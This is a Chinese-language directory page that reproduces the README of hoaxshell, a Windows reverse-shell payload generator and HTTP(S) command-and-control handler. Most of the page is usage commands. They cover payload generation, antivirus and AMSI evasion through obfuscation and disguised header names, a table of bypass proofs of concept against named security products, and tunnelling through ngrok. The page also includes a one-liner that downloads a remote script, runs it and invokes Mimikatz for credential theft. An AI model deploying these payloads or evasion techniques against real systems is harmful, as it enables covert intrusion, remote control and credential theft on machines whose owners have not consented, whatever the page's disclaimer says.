Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/t3l3machus/hoaxshell
权限提升Payload生成漏洞利用逆向工程后渗透利用渗透测试命令与控制红队
GitHubt3l3machus/hoaxshell

hoaxshell

一个Windows反向Shell有效载荷生成器和处理程序,它滥用http(s)协议来建立类似信标的反向Shell。

查看仓库
3.5k52491年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

hoaxshell

Python License

⚡ 本项目的最新版本是 HoaxShell 独立监听器,它带有更新的有效载荷模板。你也可以直接从 https://revshells.com 使用(确保选择 hoaxshell 作为监听器)。

⚠️ 截至 2022-10-18,hoaxshell 已被 AMSI 检测到(恶意软件百科)。你需要混淆生成的有效载荷才能使用。查看本视频了解如何手动混淆并绕过 MS Defender:

  • Hoaxshell 示例 -> youtube.com/watch?v=iElVfagdCD4
  • 常见 PowerShell 反弹 shell 模板示例 -> youtube.com/watch?v=3HddKylkRzM

用途

hoaxshell 是一个 Windows 反弹 shell 有效载荷生成器和处理程序,它滥用 http(s) 协议来建立类似信标的反弹 shell,基于以下概念:

image

这种 C2 概念(可以通过使用 http 以外的协议或预安装的可执行文件实现)可用于建立会话,这些会话营造出拥有 shell 的假象,但远非真正的 pty。

HoaxShell 在对抗杀毒软件方面表现良好(有关更多信息,请查看 AV 绕过 PoC 表)。尽管现在它通常会被检测到,但使用自动化工具或手动混淆生成的有效载荷很容易。

免责声明:纯粹用于测试和教育目的。请勿针对未经明确许可和授权测试的主机运行此工具生成的有效载荷。您应对使用此工具可能造成的任何麻烦负责。

视频演示

[2022-10-11] 近期精彩视频,由 John Hammond 制作 -> youtube.com/watch?v=fgSARG82TJY
[2022-07-15] 原始发布演示,由我制作 -> youtube.com/watch?v=SEufgD5UxdU

截图

image

在此处查看更多截图 here。

安装

root@kitploit:~
git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

用法

重要提示:为了避免检测,hoaxshell 在每次启动脚本时会自动为会话 ID、URL 路径以及过程中使用的自定义 HTTP 标头名称生成随机值。生成的有效载荷仅适用于为其生成的实例。使用 -g 选项可以绕过此行为,重新建立活动会话,或使用新的 hoaxshell 实例重复使用过去生成的有效载荷。

通过 http 的基本 shell 会话

当你运行 hoaxshell 时,它会生成自己的 PowerShell 有效载荷供你复制并注入到目标主机。默认情况下,有效载荷以 base64 编码以便于使用。如果你需要原始有效载荷,请执行 "rawpayload" 提示命令或使用 -r 参数启动 hoaxshell。在目标主机上执行有效载荷后,你将能够对其运行 PowerShell 命令。

利用 Invoke-Expression 的有效载荷(默认)

root@kitploit:~
sudo python3 hoaxshell.py -s <your_ip>

写入文件并从中执行命令的有效载荷

使用 -x 提供一个将在目标主机上创建的 .ps1 文件名(绝对路径)。在执行前应检查原始有效载荷,确保提供的路径可靠。

root@kitploit:~
sudo python3 hoaxshell.py -s <your_ip> -x "C:\Users\\\$env:USERNAME\.local\hack.ps1"

避免检测的推荐用法(通过 http)

Hoaxshell 利用 HTTP 标头传输 shell 会话信息。默认情况下,标头被赋予一个随机名称,可能被基于正则表达式的杀毒规则检测到。使用 -H 提供标准或自定义的 HTTP 标头名称以避免检测。

root@kitploit:~
sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization"
sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization" -x "C:\Users\\\$env:USERNAME\.local\hack.ps1"

加密 shell 会话(https + 自签名证书)

这种特殊有效载荷是一个危险信号,因为它以额外的代码块开始,指示 PowerShell 跳过 SSL 证书检查,这使其可疑且易于检测,同时长度也显著增加。不推荐使用。

root@kitploit:~
# Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

# Pass the cert.pem and key.pem as arguments:
sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

使用受信任证书的加密 shell 会话

如果你拥有一个域名,使用此选项可以通过提供你的 DN(-s)以及受信任的证书(-c cert.pem -k privkey.pem)来生成更短且更不易检测的 https 有效载荷。

root@kitploit:~
sudo python3 hoaxshell.py -s <your.domain.com> -t -c </path/to/cert.pem> -k <path/to/key.pem>

抓取会话模式

如果你意外关闭终端、断电或发生其他情况,你可以以抓取会话模式启动 hoaxshell,它将尝试重新建立会话,前提是有效载荷仍在目标主机上运行。

root@kitploit:~
sudo python3 hoaxshell.py -s <your_ip> -g

重要提示:确保以与要恢复的会话相同的设置(http/https、端口等)启动 hoaxshell。

约束语言模式支持

使用带有 -cm(--constraint-mode)选项的任何有效载荷变体,生成即使在目标主机配置为以约束语言模式运行 PowerShell 时也能工作的有效载荷。使用此选项会牺牲一点反弹 shell 的 stdout 解码准确性。

root@kitploit:~
sudo python3 hoaxshell.py -s <your_ip> -cm

image

使用隧道工具(Ngrok / LocalTunnel)通过 https 的 shell 会话

利用隧道程序 Ngrok 或 LocalTunnel 通过安全隧道获取会话,解决没有静态 IP 地址或 ISP 禁止端口转发等问题。

使用 -ng 或 --ngrok 用于 Ngrok 服务器

root@kitploit:~
sudo python3 hoaxshell.py -ng

使用 -lt 或 --localtunnel 用于 LocalTunnel 服务器

root@kitploit:~
sudo python3 hoaxshell.py -lt

限制

如果你执行一个启动交互式会话的命令,shell 将会挂起。示例:

root@kitploit:~
# 此命令将成功执行,不会出现问题: 
> powershell echo 'This is a test'

# 但此命令将在 hoaxshell 会话中打开一个交互式会话,并导致 shell 挂起:
> powershell

# 同样,执行以下命令不会有问题:
> cmd /c dir /a

# 但此命令会导致你的 hoaxshell 挂起:
> cmd.exe

因此,例如,如果你想通过 hoaxshell 运行 mimikatz,你需要调用以下命令:

root@kitploit:~
hoaxshell > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.13:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"'

简而言之,你必须小心不要在 hoaxshell PowerShell 上下文中运行启动交互式会话的 exe 或 cmd。

AV 绕过 PoC

一些很棒的人好心向我发送/发布了针对运行 MS Defender 以外的杀毒解决方案的系统执行 hoaxshell 有效载荷而未被检测到的 PoC 视频。以下是带有链接的参考表:

重要提示:我不知道你是否还能有效使用 hoaxshell 绕过这些解决方案。合理推测检测能力会很快改变(如果尚未改变)。

新闻

  • 13/10/2022 - 添加了约束语言模式支持(-cm)选项。
  • 08/10/2022 - 添加了 -ng 和 -lt 选项,用于生成使用隧道工具 ngrok 或 localtunnel 获取会话的 PS 有效载荷,以绕过静态 IP 地址和端口转发等限制。
  • 06/09/2022 - 添加了一个新的有效载荷,它将要执行的命令写入文件,而不是利用 Invoke-Expression。要使用此功能,用户必须使用 -x 选项在目标主机上提供一个 .ps1 文件名(绝对路径)。
  • 04/09/2022 - 对命令传递机制进行了改进,因为它包含可能容易被标记的组件。添加了 -t 选项以及 https_payload_trusted.ps1。你现在可以通过提供域名以及受信任的证书来使用 hoaxshell。这将生成更短且更不易检测的 https 有效载荷。
  • 01/09/2022 - 添加了 -H 选项,允许用户为攻击过程中使用的(默认为随机)标头赋予自定义名称,该标头携带 shell 的会话 ID。这使得攻击更难被检测到,例如通过使用标准标头名称,如 "Authorization"。
  • 31/08/2022 - 添加了 选项,该选项生成的 PS 有效载荷调整为使用 "Invoke-RestMethod" 替代 "Invoke-WebRequest" 工具,因此用户现在可以选择(感谢此 )。我还修复了提示符中存在的一个错误(它有时会弄乱路径)。
下载工具
杀毒软件日期PoC
SentinelOne2022-10-18https://twitter.com/i/status/1582137400880336896
Norton2022-10-17https://twitter.com/i/status/1582278579244929024
Bitdefender2022-10-15https://www.linkedin.com/posts/rohitjain-19_hoaxshell-cy83rr0h1t-penetrationtesting-activity-6987080745139765248-8cdT?utm_source=share&utm_medium=member_desktop
McAfee2022-10-15https://twitter.com/i/status/1581605531365814273
Kaspersky2022-10-13https://www.youtube.com/watch?v=IyMH_eCC4Rk
Sophos2022-09-08https://www.youtube.com/watch?v=NYR0rWx4x8k
-i
问题